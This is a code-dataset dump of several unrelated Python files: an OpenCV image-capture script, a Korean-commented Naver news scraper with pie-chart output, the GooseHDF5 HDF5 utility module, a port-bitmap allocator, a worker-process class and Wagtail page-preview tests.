'dataset/free'\nfree_count = 0\t\nblocked_count = 0\n\nbExit = 0\n\nsave_block=0 # 0: free, 1:block\n\ndef filename_free():\n global free_dir, free_count\n free_count= len(os.listdir(free_dir))\n image_path = os.path.join(free_dir, str(uuid1()) + '.jpg')\n return image_path\n \ndef filename_blocked():\n global blocked_dir, blocked_count\n blocked_count= len(os.listdir(blocked_dir))\n image_path = os.path.join(blocked_dir, str(uuid1()) + '.jpg')\n return image_path\n\ndef imageCopy(src):\n return np.copy(src)\n\ndef Video(openpath):\n \n cap = cv2.VideoCapture(openpath)\n if cap.isOpened():\n print(\"Video Opened\")\n else:\n print(\"Video Not Opened\")\n print(\"Program Abort\")\n exit()\n fps = cap.get(cv2.CAP_PROP_FPS)\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n fourcc = int(cap.get(cv2.CAP_PROP_FOURCC))\n\n cv2.namedWindow(\"Input\", cv2.WINDOW_GUI_EXPANDED)\n print(save_block)\n if save_block == '1':\n print(\"push s button to save blocked image.\")\n else:\n print(\"push s button to save free image.\")\n\n try:\n while cap.isOpened() and bExit == 0:\n # Capture frame-by-frame\n ret, frame = cap.read()\n if ret:\n frame = cv2.resize(frame, dsize=(224, 224), interpolation=cv2.INTER_AREA)\n cv2.imshow(\"Input\", frame)\n else:\n break\n \n if cv2.waitKey(int(1000.0/fps)) & 0xFF == ord('s'):\n if save_block == '1':\n filename = filename_blocked()\n else:\n filename = filename_free()\n\n print(filename)\n cv2.imwrite(filename, frame)\n \n except KeyboardInterrupt: \n print(\"key int\")\n cap.release()\n cv2.destroyAllWindows()\n time.sleep(0.5)\n return\n\t\n # When everything done, release the capture\n cap.release()\n cv2.destroyAllWindows()\n return\n \nif __name__==\"__main__\":\n\n save_block = sys.argv[1]\n\n\n try:\n os.makedirs(free_dir)\n os.makedirs(blocked_dir)\n except FileExistsError:\n print('Directories not created becasue they already exist')\n\n Video(gst_str)\n","sub_path":"CollisionAvoidance/fca_data_collection.py","file_name":"fca_data_collection.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"557964654","text":"import csv\nimport requests\nfrom bs4 import BeautifulSoup\nimport matplotlib.pyplot as plt\nimport collections\n\n# 아래는 matplotlib 한글 깨짐 방지\nimport platform\nif platform.system() == 'Darwin': #맥\n plt.rc('font', family='AppleGothic') \nplt.rcParams['axes.unicode_minus'] = False #한글 폰트 사용시 마이너스 폰트 깨짐 해결\n\n\n# user agent를 입력해야 함\nheaders = {\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\"}\n\n# 검색 내용, 크롤링 할 첫 페이지~ 마지막 페이지 입력\nquery = input(\"검색어를 입력하시오 : \")\npage1 = int(input(\"첫 페이지를 입력하시오 : \"))\npage2 = int(input(\"마지막 페이지를 입력하시오 : \"))\n\n# 크롤링 내용을 csv 파일로 저장\nfilename = f\"{query}.csv\"\nf = open(filename, \"w\", encoding = \"utf8\", newline=\"\")\nwriter = csv.writer(f)\n\nabcd_title = [\"기사제목\", \"링크\", \"언론사\"]\nwriter.writerow(abcd_title)\n\n# 크롤링 과정, 기사는 최신순으로 정렬되어 있음\noffice_list = []\nfor first in range(page1, page2+1): # 첫 페이지부터 끝 페이지까지 돌리기\n url = f\"https://search.naver.com/search.naver?where=news&sm=tab_pge&query={query}&sort=1&photo=0&field=0&pd=0&ds=&de=&mynews=0&office_type=0&office_section_code=0&news_office_checked=&nso=so:dd,p:all,a:all&start={first*10-9}\"\n\n res = requests.get(url, headers=headers)\n res.raise_for_status()\n soup = BeautifulSoup(res.text, \"lxml\")\n\n\n \n news_area = soup.find_all(\"div\", attrs={\"class\":\"news_area\"})\n for i in news_area:\n title = i.find(\"a\", attrs={\"class\":\"news_tit\"}).get_text()\n link = i.find(\"a\", attrs={\"class\":\"news_tit\"})[\"href\"]\n press = i.find(\"a\", attrs={\"class\":\"info press\"}).stripped_strings\n \n for k in press:\n if k == \"언론사 선정\":\n continue\n elif k != \"언론사 선정\":\n m = k\n office_list.append(m)\n \n \n list1 = [title,link,m]\n writer.writerow(list1)\n print(list1)\n\n# 여기서부터는 시각화 과정\ndict1 = {}\ndict1 = collections.Counter(office_list)\n\n\noffice_name = list(dict1)\noffice_value = list(dict1.values())\n\n\nplt.pie(office_value, labels=office_name, autopct='%.1f%%')\nplt.legend(office_name, loc =(1.15, 0.0))\nplt.title(f\"검색어 '{query}' 입력 시 언론사 비율 \")\nplt.show()\n\n# 해결해야할 점\n# enumarate를 통해 csv 파일에서 각 기사의 index를 나타내기\n# pie chart 정비하기 - 크기 순서대로 나타나게, 각 빈도수 나타나게, 보기 편하게,,\n\n","sub_path":"keyword.py","file_name":"keyword.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"584960386","text":"import warnings\n\nimport h5py\nimport numpy as np\n\nfrom ._version import version # noqa: F401\nfrom ._version import version_tuple # noqa: F401\n\nwarnings.filterwarnings(\"ignore\")\n\n\ndef abspath(path):\n r\"\"\"\n Return absolute path.\n\n :param str path: A HDF5-path.\n :return: The absolute path.\n \"\"\"\n\n import posixpath\n\n return posixpath.normpath(posixpath.join(\"/\", path))\n\n\ndef join(*args, root=False):\n r\"\"\"\n Join path components.\n\n :param list args: Piece of a path.\n :return: The concatenated path.\n \"\"\"\n\n import posixpath\n\n lst = []\n\n for i, arg in enumerate(args):\n if i == 0:\n lst += [arg]\n else:\n lst += [arg.strip(\"/\")]\n\n if root:\n return posixpath.join(\"/\", *lst)\n\n return posixpath.join(*lst)\n\n\ndef getdatasets(data, root=\"/\"):\n r\"\"\"\n Iterator to transverse all datasets in HDF5 file.\n\n :param h5py.File data: A HDF5-archive.\n :param str root: Start a certain point along the path-tree.\n :return: Iterator.\n\n :example:\n\n .. code-block:: python\n\n with h5py.File('...', 'r') as data:\n\n # loop over all datasets\n for path in GooseHDF5.getdatasets(data):\n print(path)\n\n # get a set of all datasets\n paths = set(GooseHDF5.getdatasets(data))\n\n # get a list of all datasets\n paths = list(GooseHDF5.getdatasets(data))\n\n Read more in `this answer `_.\n \"\"\"\n\n # ---------------------------------------------\n\n def iterator(g, prefix):\n\n for key in g.keys():\n\n item = g[key]\n path = join(prefix, key)\n\n if isinstance(item, h5py.Dataset):\n yield path\n\n elif isinstance(item, h5py.Group):\n yield from iterator(item, path)\n\n # ---------------------------------------------\n\n if isinstance(data[root], h5py.Dataset):\n yield root\n\n yield from iterator(data[root], root)\n\n\ndef getpaths(data, root=\"/\", max_depth=None, fold=None):\n r\"\"\"\n Iterator to transverse all datasets in HDF5 file.\n One can choose to fold (not transverse deeper than):\n\n - Groups deeper than a certain ``max_depth``.\n - A (list of) specific group(s).\n\n :param h5py.File data: A HDF5-archive.\n :param str root: Start a certain point along the path-tree.\n :param int max_depth: Set a maximum depth beyond which groups are folded.\n :param list fold: Specify groups that are folded.\n :return: Iterator.\n\n :example:\n\n Consider this file:\n\n .. code-block:: bash\n\n /path/to/first/a\n /path/to/first/b\n /data/c\n /data/d\n /e\n\n Calling:\n\n .. code-block:: python\n\n with h5py.File('...', 'r') as data:\n\n for path in GooseHDF5.getpaths(data, max_depth=2, fold='/data'):\n print(path)\n\n Will print:\n\n .. code-block:: bash\n\n /path/to/...\n /data/...\n /e\n\n The ``...`` indicate that it concerns a folded group, not a dataset.\n Here, the first group was folded because of the maximum depth, and the second because it was\n specifically requested to be folded.\n \"\"\"\n\n if max_depth and fold:\n return _getpaths_fold_maxdepth(data, root, fold, max_depth)\n\n if max_depth:\n return _getpaths_maxdepth(data, root, max_depth)\n\n if fold:\n return _getpaths_fold(data, root, fold)\n\n return _getpaths(data, root)\n\n\ndef _getpaths(data, root):\n r\"\"\"\n Specialization for :py:func:`getpaths`.\n \"\"\"\n\n # ---------------------------------------------\n\n def iterator(g, prefix):\n\n for key in g.keys():\n\n item = g[key]\n path = join(prefix, key)\n\n if isinstance(item, h5py.Dataset):\n yield path\n\n elif isinstance(item, h5py.Group):\n yield from iterator(item, path)\n\n # ---------------------------------------------\n\n if isinstance(data[root], h5py.Dataset):\n yield root\n\n yield from iterator(data[root], root)\n\n\ndef _getpaths_maxdepth(data, root, max_depth):\n r\"\"\"\n Specialization for :py:func:`getpaths` such that:\n\n - Groups deeper than a certain maximum depth are folded.\n \"\"\"\n\n # ---------------------------------------------\n\n def iterator(g, prefix, max_depth):\n\n for key in g.keys():\n\n item = g[key]\n path = join(prefix, key)\n\n if isinstance(item, h5py.Dataset):\n yield path\n\n elif len(path.split(\"/\")) - 1 >= max_depth:\n yield path + \"/...\"\n\n elif isinstance(item, h5py.Group):\n yield from iterator(item, path, max_depth)\n\n # ---------------------------------------------\n\n if isinstance(max_depth, str):\n max_depth = int(max_depth)\n\n if isinstance(data[root], h5py.Dataset):\n yield root\n\n yield from iterator(data[root], root, max_depth)\n\n\ndef _getpaths_fold(data, root, fold):\n r\"\"\"\n Specialization for :py:func:`getpaths` such that:\n\n - Certain groups are folded.\n \"\"\"\n\n # ---------------------------------------------\n\n def iterator(g, prefix, fold):\n\n for key in g.keys():\n\n item = g[key]\n path = join(prefix, key)\n\n if isinstance(item, h5py.Dataset):\n yield path\n\n elif path in fold:\n yield path + \"/...\"\n\n elif isinstance(item, h5py.Group):\n yield from iterator(item, path, fold)\n\n # ---------------------------------------------\n\n if isinstance(fold, str):\n fold = [fold]\n\n if isinstance(data[root], h5py.Dataset):\n yield root\n\n yield from iterator(data[root], root, fold)\n\n\ndef _getpaths_fold_maxdepth(data, root, fold, max_depth):\n r\"\"\"\n Specialization for :py:func:`getpaths` such that:\n\n - Certain groups are folded.\n - Groups deeper than a certain maximum depth are folded.\n \"\"\"\n\n # ---------------------------------------------\n\n def iterator(g, prefix, fold, max_depth):\n\n for key in g.keys():\n\n item = g[key]\n path = join(prefix, key)\n\n if isinstance(item, h5py.Dataset):\n yield path\n\n elif len(path.split(\"/\")) - 1 >= max_depth:\n yield path + \"/...\"\n\n elif path in fold:\n yield path + \"/...\"\n\n elif isinstance(item, h5py.Group):\n yield from iterator(item, path, fold, max_depth)\n\n # ---------------------------------------------\n\n if isinstance(max_depth, str):\n max_depth = int(max_depth)\n\n if isinstance(fold, str):\n fold = [fold]\n\n if isinstance(data[root], h5py.Dataset):\n yield root\n\n yield from iterator(data[root], root, fold, max_depth)\n\n\ndef filter_datasets(data, paths):\n r\"\"\"\n From a list of paths, filter those paths that do not point to datasets.\n\n This function can, for example, be used in conjunction with :py:func:`getpaths`:\n\n .. code-block:: python\n\n with h5py.File('...', 'r') as data:\n\n datasets = GooseHDF5.filter_datasets(data,\n GooseHDF5.getpaths(data, max_depth=2, fold='/data'))\n\n :param h5py.File data: A HDF5-archive.\n :param list paths: List of HDF5-paths.\n :return: Filtered ``paths``.\n \"\"\"\n\n import re\n\n paths = list(paths)\n paths = [path for path in paths if not re.match(r\"(.*)(/\\.\\.\\.)\", path)]\n paths = [path for path in paths if isinstance(data[path], h5py.Dataset)]\n return paths\n\n\ndef verify(data, datasets, error=False):\n r\"\"\"\n Try reading each datasets.\n\n :param h5py.File data: A HDF5-archive.\n :param list datasets: List of HDF5-paths tp datasets.\n\n :param bool error:\n - If ``True``, the function raises an error if reading failed.\n - If ``False``, the function just continues.\n\n :return: List with only those datasets that can be successfully opened.\n \"\"\"\n\n ret = []\n\n for path in datasets:\n\n try:\n data[path][...]\n except: # noqa: E722\n if error:\n raise OSError(f'Error reading \"{path:s}\"')\n else:\n continue\n\n ret += [path]\n\n return ret\n\n\ndef exists(data, path):\n r\"\"\"\n Check if a path exists in the HDF5-archive.\n\n :param h5py.File data: A HDF5-archive.\n :param str path: HDF5-path.\n \"\"\"\n\n if path in data:\n return True\n\n return False\n\n\ndef exists_any(data, paths):\n r\"\"\"\n Check if any of the input paths exists in the HDF5-archive.\n\n :param h5py.File data: A HDF5-archive.\n :param list path: List of HDF5-paths.\n \"\"\"\n\n if isinstance(paths, str):\n paths = [paths]\n\n for path in paths:\n if exists(data, path):\n return True\n\n return False\n\n\ndef exists_all(data, paths):\n r\"\"\"\n Check if all of the input paths exists in the HDF5-archive.\n\n :arguments:\n\n :param h5py.File data: A HDF5-archive.\n :param list path: List of HDF5-paths.\n \"\"\"\n\n if isinstance(paths, str):\n paths = [paths]\n\n for path in paths:\n if not exists(data, path):\n return False\n\n return True\n\n\ndef copydatasets(source, dest, source_datasets, dest_datasets=None, root=None):\n r\"\"\"\n Copy all datasets from one HDF5-archive ``source`` to another HDF5-archive ``dest``.\n The datasets can be renamed by specifying a list of ``dest_datasets``\n (whose entries should correspond to the ``source_datasets``).\n\n In addition, a ``root`` (path prefix) for the destination datasets name can be specified.\n\n :param h5py.File source: The source HDF5-archive.\n :param h5py.File dest: The destination HDF5-archive.\n :param list source_datasets: List of dataset-paths in ``source``.\n :param list dest_datasets: List of dataset-paths in ``dest``, defaults to ``source_datasets``.\n :param str root: Path prefix for all ``dest_datasets``.\n \"\"\"\n\n import posixpath\n\n source_datasets = [abspath(path) for path in source_datasets]\n\n if not dest_datasets:\n dest_datasets = [path for path in source_datasets]\n\n if root:\n dest_datasets = [join(root, path, root=True) for path in dest_datasets]\n\n for dest_path in dest_datasets:\n if exists(dest, dest_path):\n raise OSError(f'Dataset \"{dest_path:s}\" already exists')\n\n # extract groups and sort based on depth\n groups = list({posixpath.split(path)[0] for path in dest_datasets})\n groups = [group for group in groups if group != \"/\"]\n groups = sorted(groups, key=lambda group: (group.count(\"/\"), group))\n\n # create groups\n for group in groups:\n if not exists(dest, group):\n dest.create_group(group)\n\n # copy datasets\n for source_path, dest_path in zip(source_datasets, dest_datasets):\n group = posixpath.split(dest_path)[0]\n source.copy(source_path, dest[group], posixpath.split(dest_path)[1])\n\n\ndef isnumeric(a):\n r\"\"\"\n Returns ``True`` is an array contains numeric values.\n\n :param array a: An array.\n :return: bool\n \"\"\"\n\n import numpy as np\n\n if type(a) == str:\n return False\n\n if np.issubdtype(a.dtype, np.number):\n return True\n\n return False\n\n\ndef _equal_value(a, b):\n\n import numpy as np\n\n if type(a) == str:\n if type(b) == str:\n return a == b\n else:\n return False\n\n if a.size != b.size:\n return False\n\n if np.issubdtype(a.dtype, np.floating):\n if not np.issubdtype(b.dtype, np.floating):\n return False\n if np.allclose(a, b):\n return True\n return False\n\n if np.issubdtype(a.dtype, np.integer):\n if not np.issubdtype(b.dtype, np.integer):\n return False\n if np.all(np.equal(a, b)):\n return True\n return False\n\n if a.dtype == np.bool_:\n if b.dtype != np.bool_:\n return False\n if np.all(np.equal(a, b)):\n return True\n return False\n\n if a.size == 1:\n if a[...] == b[...]:\n return True\n else:\n return False\n\n return list(a[...]) == list(b[...])\n\n\ndef _equal(a, b):\n\n if isinstance(a, h5py.Group) and isinstance(b, h5py.Group):\n return True\n\n if not isinstance(a, h5py.Dataset) or not isinstance(b, h5py.Dataset):\n raise OSError(\"Not a Dataset\")\n\n for key in a.attrs:\n if key not in b.attrs:\n return False\n if not _equal_value(a.attrs[key], b.attrs[key]):\n return False\n\n for key in b.attrs:\n if key not in a.attrs:\n return False\n\n return _equal_value(a, b)\n\n\ndef equal(source, dest, source_dataset, dest_dataset=None):\n r\"\"\"\n Check that a dataset is equal in both files.\n\n :param h5py.File source: The source HDF5-archive.\n :param h5py.File dest: The destination HDF5-archive.\n :param list source_datasets: List of dataset-paths in ``source``.\n :param list dest_datasets: List of dataset-paths in ``dest``, defaults to ``source_datasets``.\n \"\"\"\n\n if not dest_dataset:\n dest_dataset = source_dataset\n\n if source_dataset not in source:\n raise OSError(f'\"{source_dataset:s} not in {source.filename:s}')\n\n if dest_dataset not in dest:\n raise OSError(f'\"{dest_dataset:s} not in {dest.filename:s}')\n\n return _equal(source[source_dataset], dest[dest_dataset])\n\n\ndef allequal(source, dest, source_datasets, dest_datasets=None):\n r\"\"\"\n Check that all listed datasets are equal in both files.\n\n :param h5py.File source: The source HDF5-archive.\n :param h5py.File dest: The destination HDF5-archive.\n :param list source_datasets: List of dataset-paths in ``source``.\n :param list dest_datasets: List of dataset-paths in ``dest``, defaults to ``source_datasets``.\n \"\"\"\n\n if not dest_datasets:\n dest_datasets = [path for path in source_datasets]\n\n for source_dataset, dest_dataset in zip(source_datasets, dest_datasets):\n if not equal(source, dest, source_dataset, dest_dataset):\n return False\n\n return True\n\n\ndef copy_dataset(source, dest, paths, compress=False, double_to_float=False):\n r\"\"\"\n Copy a dataset from one file to another. This function also copies possible attributes.\n\n :param h5py.File source: The source HDF5-archive.\n :param h5py.File dest: The destination HDF5-archive.\n\n :type paths: str, list\n :param paths: (List of) HDF5-path(s) to copy.\n\n :param bool compress: Compress the destination dataset(s).\n :param bool double_to_float: Convert doubles to floats before copying.\n \"\"\"\n\n if type(paths) != list:\n paths = list(paths)\n\n for path in paths:\n\n data = source[path][...]\n\n if data.size == 1 or not compress or not isnumeric(data):\n dest[path] = source[path][...]\n else:\n dtype = source[path].dtype\n if dtype == np.float64 and double_to_float:\n dtype = np.float32\n dset = dest.create_dataset(\n path, data.shape, dtype=dtype, compression=\"gzip\"\n )\n dset[:] = data\n\n for key in source[path].attrs:\n dest[path].attrs[key] = source[path].attrs[key]\n","sub_path":"GooseHDF5/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":15406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"536877390","text":"__author__ = 'Sagar'\nfrom pygraphdb.services.common.communicationservice import CommunicationService\nfrom pygraphdb.services.common.heartbeatservice import HeartBeatService\nimport configparser\n\nclass WorkerProcess(object):\n def __init__(self):\n super(WorkerProcess, self).__init__()\n self._name = None\n self._master_port = None\n self._master_hostname = None\n self._services = {}\n\n def init(self, config_path):\n config = configparser.ConfigParser(allow_no_value=True)\n config.read(config_path)\n self._name = config['Node']['Name']\n self._master_port = int(config['Node']['MasterNodePort'])\n self._master_hostname = config['Node']['MasterNodeHostname']\n\n def run(self):\n communication_service = CommunicationService(self._master_hostname, self._master_port, self._name, False)\n communication_service.start()\n self._services['CommunicationService'] = communication_service\n heartbeat_service = HeartBeatService(communication_service, 5)\n communication_service.register('HeartBeatService', heartbeat_service.get_queue())\n heartbeat_service.start()\n self._services['HeartBeatService'] = heartbeat_service","sub_path":"process/workerprocess.py","file_name":"workerprocess.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"463297420","text":"#!/usr/bin/env python3\n\nMAX_PORTS = 1 << 17 # let us support 128K ports\n\n# the minimum port number we can assign. should be a power of 2\n\nMIN_START_PORT = 1 << 13 \n\nMIN_PORT_BYTEARRAY_INDEX = MIN_START_PORT >> 3\nMAX_PORTS_BYTEARRAY_LEN = MAX_PORTS >> 3\n\nclass Ports(object):\n def __init__(self, ports):\n assert len(ports) == MAX_PORTS_BYTEARRAY_LEN\n self.ports = bytearray(ports)\n\n def assignFreePort(self, numports = 1, scanstart = MIN_START_PORT):\n \"\"\"returns numports number of ports as a list. \"\"\"\n \n if scanstart < MIN_START_PORT:\n scanstart = MIN_START_PORT\n\n ssindex = scanstart >> 3\n\n for index in range(ssindex, MAX_PORTS_BYTEARRAY_LEN):\n assert(index >= 0 and index < MAX_PORTS_BYTEARRAY_LEN)\n portbyte = self.ports[index]\n assert portbyte >= 0 and portbyte <= 255\n if portbyte == 255:\n continue\n\n bit = 0\n for bit in range(0, 8):\n if portbyte & (1 << bit):\n continue\n break\n \n port = (index << 3) + bit\n# print ('bit', bit, 'in byte', index, 'is available', 'port #', port, bin(portbyte))\n self.ports[index] |= (1 << bit)\n return port\n\n return None\n\n @classmethod\n def initPorts(cls):\n \"\"\" initializes a backend ports bitmap for use \"\"\"\n return bytearray(MAX_PORTS_BYTEARRAY_LEN)\n\nif __name__ == '__main__':\n ports = Ports.initPorts()\n ports = Ports(ports)\n for i in range(0, 10):\n print(ports.assignFreePort())\n","sub_path":"spmc/ports.py","file_name":"ports.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"463057218","text":"import datetime\nfrom functools import wraps\nfrom unittest import mock\n\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom freezegun import freeze_time\n\nfrom wagtail.admin.edit_handlers import FieldPanel, ObjectList, TabbedInterface\nfrom wagtail.admin.views.pages.preview import PreviewOnEdit\nfrom wagtail.core.models import Page\nfrom wagtail.tests.testapp.models import (\n EventCategory,\n EventPage,\n SimplePage,\n StreamPage,\n)\nfrom wagtail.tests.utils import WagtailTestUtils\n\n\nclass TestIssue2599(TestCase, WagtailTestUtils):\n \"\"\"\n When previewing a page on creation, we need to assign it a path value consistent with its\n (future) position in the tree. The naive way of doing this is to give it an index number\n one more than numchild - however, index numbers are not reassigned on page deletion, so\n this can result in a path that collides with an existing page (which is invalid).\n \"\"\"\n\n def test_issue_2599(self):\n homepage = Page.objects.get(id=2)\n\n child1 = Page(title=\"child1\")\n homepage.add_child(instance=child1)\n child2 = Page(title=\"child2\")\n homepage.add_child(instance=child2)\n\n child1.delete()\n\n self.login()\n post_data = {\n \"title\": \"New page!\",\n \"content\": \"Some content\",\n \"slug\": \"hello-world\",\n \"action-submit\": \"Submit\",\n }\n preview_url = reverse(\n \"wagtailadmin_pages:preview_on_add\",\n args=(\"tests\", \"simplepage\", homepage.id),\n )\n response = self.client.post(preview_url, post_data)\n\n # Check the JSON response\n self.assertEqual(response.status_code, 200)\n self.assertJSONEqual(response.content.decode(), {\"is_valid\": True})\n\n response = self.client.get(preview_url)\n\n # Check the HTML response\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"tests/simple_page.html\")\n self.assertContains(response, \"New page!\")\n\n # Check that the treebeard attributes were set correctly on the page object\n self.assertEqual(response.context[\"self\"].depth, homepage.depth + 1)\n self.assertTrue(response.context[\"self\"].path.startswith(homepage.path))\n self.assertEqual(response.context[\"self\"].get_parent(), homepage)\n\n\ndef clear_edit_handler(page_cls):\n def decorator(fn):\n @wraps(fn)\n def decorated(*args, **kwargs):\n # Clear any old EditHandlers generated\n page_cls.get_edit_handler.cache_clear()\n try:\n fn(*args, **kwargs)\n finally:\n # Clear the bad EditHandler generated just now\n page_cls.get_edit_handler.cache_clear()\n\n return decorated\n\n return decorator\n\n\nclass TestPreview(TestCase, WagtailTestUtils):\n fixtures = [\"test.json\"]\n\n def setUp(self):\n self.meetings_category = EventCategory.objects.create(name=\"Meetings\")\n self.parties_category = EventCategory.objects.create(name=\"Parties\")\n self.holidays_category = EventCategory.objects.create(name=\"Holidays\")\n\n self.home_page = Page.objects.get(url_path=\"/home/\")\n self.event_page = Page.objects.get(url_path=\"/home/events/christmas/\")\n\n self.user = self.login()\n\n self.post_data = {\n \"title\": \"Beach party\",\n \"slug\": \"beach-party\",\n \"body\": \"\"\"{\"entityMap\": {},\"blocks\": [\n {\"inlineStyleRanges\": [], \"text\": \"party on wayne\", \"depth\": 0, \"type\": \"unstyled\", \"key\": \"00000\", \"entityRanges\": []}\n ]}\"\"\",\n \"date_from\": \"2017-08-01\",\n \"audience\": \"public\",\n \"location\": \"the beach\",\n \"cost\": \"six squid\",\n \"carousel_items-TOTAL_FORMS\": 0,\n \"carousel_items-INITIAL_FORMS\": 0,\n \"carousel_items-MIN_NUM_FORMS\": 0,\n \"carousel_items-MAX_NUM_FORMS\": 0,\n \"speakers-TOTAL_FORMS\": 0,\n \"speakers-INITIAL_FORMS\": 0,\n \"speakers-MIN_NUM_FORMS\": 0,\n \"speakers-MAX_NUM_FORMS\": 0,\n \"related_links-TOTAL_FORMS\": 0,\n \"related_links-INITIAL_FORMS\": 0,\n \"related_links-MIN_NUM_FORMS\": 0,\n \"related_links-MAX_NUM_FORMS\": 0,\n \"head_counts-TOTAL_FORMS\": 0,\n \"head_counts-INITIAL_FORMS\": 0,\n \"head_counts-MIN_NUM_FORMS\": 0,\n \"head_counts-MAX_NUM_FORMS\": 0,\n \"categories\": [self.parties_category.id, self.holidays_category.id],\n \"comments-TOTAL_FORMS\": 0,\n \"comments-INITIAL_FORMS\": 0,\n \"comments-MIN_NUM_FORMS\": 0,\n \"comments-MAX_NUM_FORMS\": 1000,\n }\n\n def test_preview_on_create_with_m2m_field(self):\n preview_url = reverse(\n \"wagtailadmin_pages:preview_on_add\",\n args=(\"tests\", \"eventpage\", self.home_page.id),\n )\n response = self.client.post(preview_url, self.post_data)\n\n # Check the JSON response\n self.assertEqual(response.status_code, 200)\n self.assertJSONEqual(response.content.decode(), {\"is_valid\": True})\n\n # Check the user can refresh the preview\n preview_session_key = \"wagtail-preview-tests-eventpage-{}\".format(\n self.home_page.id\n )\n self.assertIn(preview_session_key, self.client.session)\n\n response = self.client.get(preview_url)\n\n # Check the HTML response\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"tests/event_page.html\")\n self.assertContains(response, \"Beach party\")\n self.assertContains(response, \"
  • Parties
  • \")\n self.assertContains(response, \"
  • Holidays
  • \")\n\n def test_preview_on_edit_with_m2m_field(self):\n preview_url = reverse(\n \"wagtailadmin_pages:preview_on_edit\", args=(self.event_page.id,)\n )\n response = self.client.post(preview_url, self.post_data)\n\n # Check the JSON response\n self.assertEqual(response.status_code, 200)\n self.assertJSONEqual(response.content.decode(), {\"is_valid\": True})\n\n # Check the user can refresh the preview\n preview_session_key = \"wagtail-preview-{}\".format(self.event_page.id)\n self.assertIn(preview_session_key, self.client.session)\n\n response = self.client.get(preview_url)\n\n # Check the HTML response\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"tests/event_page.html\")\n self.assertContains(response, \"Beach party\")\n self.assertContains(response, \"
  • Parties
  • \")\n self.assertContains(response, \"
  • Holidays
  • \")\n\n def test_preview_on_edit_expiry(self):\n initial_datetime = timezone.now()\n expiry_datetime = initial_datetime + datetime.timedelta(\n seconds=PreviewOnEdit.preview_expiration_timeout + 1\n )\n\n with freeze_time(initial_datetime) as frozen_datetime:\n preview_url = reverse(\n \"wagtailadmin_pages:preview_on_edit\", args=(self.event_page.id,)\n )\n response = self.client.post(preview_url, self.post_data)\n\n # Check the JSON response\n self.assertEqual(response.status_code, 200)\n\n response = self.client.get(preview_url)\n\n # Check the HTML response\n self.assertEqual(response.status_code, 200)\n\n frozen_datetime.move_to(expiry_datetime)\n\n preview_url = reverse(\n \"wagtailadmin_pages:preview_on_edit\", args=(self.home_page.id,)\n )\n response = self.client.post(preview_url, self.post_data)\n self.assertEqual(response.status_code, 200)\n response = self.client.get(preview_url)\n self.assertEqual(response.status_code, 200)\n\n @clear_edit_handler(EventPage)\n def test_preview_with_custom_edit_handler(self):\n \"\"\"\n The test is based on TestPreview.test_preview_on_create_with_m2m_field, except that the \"categories\"\n FieldPanel is only visible to superusers. Non-superusers should not be able to set \"categories\" for\n the preview.\n \"\"\"\n\n class SuperuserEventCategoriesObjectList(ObjectList):\n def on_request_bound(self):\n new_children = []\n for child in self.children:\n # skip the \"categories\" FieldPanel for non-superusers\n if (\n isinstance(child, FieldPanel)\n and child.field_name == \"categories\"\n and not self.request.user.is_superuser\n ):\n continue\n\n new_child = child.bind_to(\n model=self.model,\n instance=self.instance,\n request=self.request,\n form=self.form,\n )\n new_children.append(new_child)\n self.children = new_children\n\n new_tabbed_interface = TabbedInterface(\n [\n SuperuserEventCategoriesObjectList(EventPage.content_panels),\n ObjectList(EventPage.promote_panels),\n ]\n )\n\n with mock.patch.object(\n EventPage, \"edit_handler\", new=new_tabbed_interface, create=True\n ):\n # Non-superusers should not see categories panel, so even though \"post_data\" contains \"categories\",\n # it should not be considered for the preview request.\n self.login(username=\"siteeditor\", password=\"password\")\n\n preview_url = reverse(\n \"wagtailadmin_pages:preview_on_add\",\n args=(\"tests\", \"eventpage\", self.home_page.id),\n )\n response = self.client.post(preview_url, self.post_data)\n\n # Check the JSON response\n self.assertEqual(response.status_code, 200)\n self.assertJSONEqual(response.content.decode(), {\"is_valid\": True})\n\n # Check the user can refresh the preview\n preview_session_key = \"wagtail-preview-tests-eventpage-{}\".format(\n self.home_page.id\n )\n self.assertIn(preview_session_key, self.client.session)\n\n response = self.client.get(preview_url)\n\n # Check the HTML response\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"tests/event_page.html\")\n self.assertContains(response, \"Beach party\")\n self.assertNotContains(response, \"
  • Parties
  • \")\n self.assertNotContains(response, \"
  • Holidays
  • \")\n\n # Since superusers see the \"categories\" panel, the posted data should be used for the preview.\n self.login(username=\"superuser\", password=\"password\")\n response = self.client.post(preview_url, self.post_data)\n\n # Check the JSON response\n self.assertEqual(response.status_code, 200)\n self.assertJSONEqual(response.content.decode(), {\"is_valid\": True})\n\n # Check the user can refresh the preview\n preview_session_key = \"wagtail-preview-tests-eventpage-{}\".format(\n self.home_page.id\n )\n self.assertIn(preview_session_key, self.client.session)\n\n response = self.client.get(preview_url)\n\n # Check the HTML response\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"tests/event_page.html\")\n self.assertContains(response, \"Beach party\")\n self.assertContains(response, \"
  • Parties
  • \")\n self.assertContains(response, \"
  • Holidays
